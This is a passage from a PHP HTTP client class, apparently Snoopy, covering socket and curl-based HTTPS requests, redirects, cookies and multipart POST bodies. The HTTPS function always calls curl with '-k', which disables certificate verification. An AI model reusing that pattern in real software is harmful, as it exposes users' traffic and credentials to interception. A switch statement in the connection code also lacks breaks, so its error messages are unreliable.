"|^(?!http://)(?!mailto:)|i", "|/\./|", "|/[^\/]+/\.\./|" ); $replace = array( "", $match_root."/", $match."/", "/", "/" ); $expandedLinks = preg_replace($search,$replace,$links); return $expandedLinks; } /*======================================================================*\ Function: _httprequest Purpose: go get the http data from the server Input: $url the url to fetch $fp the current open file pointer $URI the full URI $body body contents to send if any (POST) Output: \*======================================================================*/ function _httprequest($url,$fp,$URI,$http_method,$content_type="",$body="") { $cookie_headers = ''; if($this->passcookies && $this->_redirectaddr) $this->setcookies(); $URI_PARTS = parse_url($URI); if(empty($url)) $url = "/"; $headers = $http_method." ".$url." ".$this->_httpversion."\r\n"; if(!empty($this->agent)) $headers .= "User-Agent: ".$this->agent."\r\n"; if(!empty($this->host) && !isset($this->rawheaders['Host'])) { $headers .= "Host: ".$this->host; if(!empty($this->port) && $this->port != 80) $headers .= ":".$this->port; $headers .= "\r\n"; } if(!empty($this->accept)) $headers .= "Accept: ".$this->accept."\r\n"; if(!empty($this->referer)) $headers .= "Referer: ".$this->referer."\r\n"; if(!empty($this->cookies)) { if(!is_array($this->cookies)) $this->cookies = (array)$this->cookies; reset($this->cookies); if ( count($this->cookies) > 0 ) { $cookie_headers .= 'Cookie: '; foreach ( $this->cookies as $cookieKey => $cookieVal ) { $cookie_headers .= $cookieKey."=".urlencode($cookieVal)."; "; } $headers .= substr($cookie_headers,0,-2) . "\r\n"; } } if(!empty($this->rawheaders)) { if(!is_array($this->rawheaders)) $this->rawheaders = (array)$this->rawheaders; foreach ( $this->rawheaders as $headerKey => $headerVal ) $headers .= $headerKey.": ".$headerVal."\r\n"; } if(!empty($content_type)) { $headers .= "Content-Type: $content_type"; if ($content_type == "multipart/form-data") $headers .= "; boundary=".$this->_mime_boundary; $headers .= "\r\n"; } if(!empty($body)) $headers .= "Content-Length: ".strlen($body)."\r\n"; if(!empty($this->user) || !empty($this->pass)) $headers .= "Authorization: Basic ".base64_encode($this->user.":".$this->pass)."\r\n"; //add proxy auth headers if(!empty($this->proxy_user)) $headers .= 'Proxy-Authorization: ' . 'Basic ' . base64_encode($this->proxy_user . ':' . $this->proxy_pass)."\r\n"; $headers .= "\r\n"; // set the read timeout if needed if ($this->read_timeout > 0) socket_set_timeout($fp, $this->read_timeout); $this->timed_out = false; fwrite($fp,$headers.$body,strlen($headers.$body)); $this->_redirectaddr = false; unset($this->headers); while($currentHeader = fgets($fp,$this->_maxlinelen)) { if ($this->read_timeout > 0 && $this->_check_timeout($fp)) { $this->status=-100; return false; } if($currentHeader == "\r\n") break; // if a header begins with Location: or URI:, set the redirect if(preg_match("/^(Location:|URI:)/i",$currentHeader)) { // get URL portion of the redirect preg_match("/^(Location:|URI:)[ ]+(.*)/i",chop($currentHeader),$matches); // look for :// in the Location header to see if hostname is included if(!preg_match("|\:\/\/|",$matches[2])) { // no host in the path, so prepend $this->_redirectaddr = $URI_PARTS["scheme"]."://".$this->host.":".$this->port; // eliminate double slash if(!preg_match("|^/|",$matches[2])) $this->_redirectaddr .= "/".$matches[2]; else $this->_redirectaddr .= $matches[2]; } else $this->_redirectaddr = $matches[2]; } if(preg_match("|^HTTP/|",$currentHeader)) { if(preg_match("|^HTTP/[^\s]*\s(.*?)\s|",$currentHeader, $status)) { $this->status= $status[1]; } $this->response_code = $currentHeader; } $this->headers[] = $currentHeader; } $results = ''; do { $_data = fread($fp, $this->maxlength); if (strlen($_data) == 0) { break; } $results .= $_data; } while(true); if ($this->read_timeout > 0 && $this->_check_timeout($fp)) { $this->status=-100; return false; } // check if there is a redirect meta tag if(preg_match("'<meta[\s]*http-equiv[^>]*?content[\s]*=[\s]*[\"\']?\d+;[\s]*URL[\s]*=[\s]*([^\"\']*?)[\"\']?>'i",$results,$match)) { $this->_redirectaddr = $this->_expandlinks($match[1],$URI); } // have we hit our frame depth and is there frame src to fetch? if(($this->_framedepth < $this->maxframes) && preg_match_all("'<frame\s+.*src[\s]*=[\'\"]?([^\'\"\>]+)'i",$results,$match)) { $this->results[] = $results; for($x=0; $x<count($match[1]); $x++) $this->_frameurls[] = $this->_expandlinks($match[1][$x],$URI_PARTS["scheme"]."://".$this->host); } // have we already fetched framed content? elseif(is_array($this->results)) $this->results[] = $results; // no framed content else $this->results = $results; return true; } /*======================================================================*\ Function: _httpsrequest Purpose: go get the https data from the server using curl Input: $url the url to fetch $URI the full URI $body body contents to send if any (POST) Output: \*======================================================================*/ function _httpsrequest($url,$URI,$http_method,$content_type="",$body="") { if($this->passcookies && $this->_redirectaddr) $this->setcookies(); $headers = array(); $URI_PARTS = parse_url($URI); if(empty($url)) $url = "/"; // GET ... header not needed for curl //$headers[] = $http_method." ".$url." ".$this->_httpversion; if(!empty($this->agent)) $headers[] = "User-Agent: ".$this->agent; if(!empty($this->host)) if(!empty($this->port)) $headers[] = "Host: ".$this->host.":".$this->port; else $headers[] = "Host: ".$this->host; if(!empty($this->accept)) $headers[] = "Accept: ".$this->accept; if(!empty($this->referer)) $headers[] = "Referer: ".$this->referer; if(!empty($this->cookies)) { if(!is_array($this->cookies)) $this->cookies = (array)$this->cookies; reset($this->cookies); if ( count($this->cookies) > 0 ) { $cookie_str = 'Cookie: '; foreach ( $this->cookies as $cookieKey => $cookieVal ) { $cookie_str .= $cookieKey."=".urlencode($cookieVal)."; "; } $headers[] = substr($cookie_str,0,-2); } } if(!empty($this->rawheaders)) { if(!is_array($this->rawheaders)) $this->rawheaders = (array)$this->rawheaders; foreach ( $this->rawheaders as $headerKey => $headerVal ) $headers[] = $headerKey.": ".$headerVal; } if(!empty($content_type)) { if ($content_type == "multipart/form-data") $headers[] = "Content-Type: $content_type; boundary=".$this->_mime_boundary; else $headers[] = "Content-Type: $content_type"; } if(!empty($body)) $headers[] = "Content-Length: ".strlen($body); if(!empty($this->user) || !empty($this->pass)) $headers[] = "Authorization: BASIC ".base64_encode($this->user.":".$this->pass); $headerfile = tempnam( $this->temp_dir, "sno" ); $cmdline_params = '-k -D ' . escapeshellarg( $headerfile ); foreach ( $headers as $header ) { $cmdline_params .= ' -H ' . escapeshellarg( $header ); } if ( ! empty( $body ) ) { $cmdline_params .= ' -d ' . escapeshellarg( $body ); } if ( $this->read_timeout > 0 ) { $cmdline_params .= ' -m ' . escapeshellarg( $this->read_timeout ); } exec( $this->curl_path . ' ' . $cmdline_params . ' ' . escapeshellarg( $URI ), $results, $return ); if($return) { $this->error = "Error: cURL could not retrieve the document, error $return."; return false; } $results = implode("\r\n",$results); $result_headers = file("$headerfile"); $this->_redirectaddr = false; unset($this->headers); for($currentHeader = 0; $currentHeader < count($result_headers); $currentHeader++) { // if a header begins with Location: or URI:, set the redirect if(preg_match("/^(Location: |URI: )/i",$result_headers[$currentHeader])) { // get URL portion of the redirect preg_match("/^(Location: |URI:)\s+(.*)/",chop($result_headers[$currentHeader]),$matches); // look for :// in the Location header to see if hostname is included if(!preg_match("|\:\/\/|",$matches[2])) { // no host in the path, so prepend $this->_redirectaddr = $URI_PARTS["scheme"]."://".$this->host.":".$this->port; // eliminate double slash if(!preg_match("|^/|",$matches[2])) $this->_redirectaddr .= "/".$matches[2]; else $this->_redirectaddr .= $matches[2]; } else $this->_redirectaddr = $matches[2]; } if(preg_match("|^HTTP/|",$result_headers[$currentHeader])) $this->response_code = $result_headers[$currentHeader]; $this->headers[] = $result_headers[$currentHeader]; } // check if there is a redirect meta tag if(preg_match("'<meta[\s]*http-equiv[^>]*?content[\s]*=[\s]*[\"\']?\d+;[\s]*URL[\s]*=[\s]*([^\"\']*?)[\"\']?>'i",$results,$match)) { $this->_redirectaddr = $this->_expandlinks($match[1],$URI); } // have we hit our frame depth and is there frame src to fetch? if(($this->_framedepth < $this->maxframes) && preg_match_all("'<frame\s+.*src[\s]*=[\'\"]?([^\'\"\>]+)'i",$results,$match)) { $this->results[] = $results; for($x=0; $x<count($match[1]); $x++) $this->_frameurls[] = $this->_expandlinks($match[1][$x],$URI_PARTS["scheme"]."://".$this->host); } // have we already fetched framed content? elseif(is_array($this->results)) $this->results[] = $results; // no framed content else $this->results = $results; unlink("$headerfile"); return true; } /*======================================================================*\ Function: setcookies() Purpose: set cookies for a redirection \*======================================================================*/ function setcookies() { for($x=0; $x<count($this->headers); $x++) { if(preg_match('/^set-cookie:[\s]+([^=]+)=([^;]+)/i', $this->headers[$x],$match)) $this->cookies[$match[1]] = urldecode($match[2]); } } /*======================================================================*\ Function: _check_timeout Purpose: checks whether timeout has occurred Input: $fp file pointer \*======================================================================*/ function _check_timeout($fp) { if ($this->read_timeout > 0) { $fp_status = socket_get_status($fp); if ($fp_status["timed_out"]) { $this->timed_out = true; return true; } } return false; } /*======================================================================*\ Function: _connect Purpose: make a socket connection Input: $fp file pointer \*======================================================================*/ function _connect(&$fp) { if(!empty($this->proxy_host) && !empty($this->proxy_port)) { $this->_isproxy = true; $host = $this->proxy_host; $port = $this->proxy_port; } else { $host = $this->host; $port = $this->port; } $this->status = 0; if($fp = fsockopen( $host, $port, $errno, $errstr, $this->_fp_timeout )) { // socket connection succeeded return true; } else { // socket connection failed $this->status = $errno; switch($errno) { case -3: $this->error="socket creation failed (-3)"; case -4: $this->error="dns lookup failure (-4)"; case -5: $this->error="connection refused or timed out (-5)"; default: $this->error="connection failed (".$errno.")"; } return false; } } /*======================================================================*\ Function: _disconnect Purpose: disconnect a socket connection Input: $fp file pointer \*======================================================================*/ function _disconnect($fp) { return(fclose($fp)); } /*======================================================================*\ Function: _prepare_post_body Purpose: Prepare post body according to encoding type Input: $formvars - form variables $formfiles - form upload files Output: post body \*======================================================================*/ function _prepare_post_body($formvars, $formfiles) { settype($formvars, "array"); settype($formfiles, "array"); $postdata = ''; if (count($formvars) == 0 && count($formfiles) == 0) return; switch ($this->_submit_type) { case "application/x-www-form-urlencoded": reset($formvars); foreach ( $formvars as $key => $val ) { if (is_array($val) || is_object($val)) { foreach ( $val as $cur_key => $cur_val ) { $postdata .= urlencode($key)."[]=".urlencode($cur_val)."&"; } } else $postdata .= urlencode($key)."=".urlencode($val)."&"; } break; case "multipart/form-data": $this->_mime_boundary = "Snoopy".md5(uniqid(microtime())); reset($formvars); foreach ( $formvars as $key => $val ) { if (is_array($val) || is_object($val)) { foreach ( $val as $cur_key => $cur_val ) { $postdata .= "--".$this->_mime_boundary."\r\n"; $postdata .= "Content-Disposition: form-data; name=\"$key\[\]\"\r\n\r\n"; $postdata .= "$cur_val\r\n"; } } else { $postdata .= "--".$this->_mime_boundary."\r\n"; $postdata .= "Content-Disposition: form-data; name=\"$key\"\r\n\r\n"; $postdata .= "$val\r\n"; } } reset($formfiles); foreach ( $formfiles as $field_name => $file_names ) { settype($file_names, "array"); foreach ( $file_names as $file_name ) { if (!is_readable($file_name)) continue; $fp = fopen($file_name, "r"); $file_content = fread($fp, filesize($file_name)); fclose($fp); $base_name = basename($file_name); $postdata .= "--".$this->_mime_boundary."\r\n"; $postdata .= "Content-Disposition: form-data; name=\"$field_name\"; filename=\"$base_name\"\r\n\r\n"; $postdata .= "$file_content\r\n"; } } $postdata .= "--".$this->_mime_boundary."--\r\n"; break; } return $postdata; } } endif; ?>
Close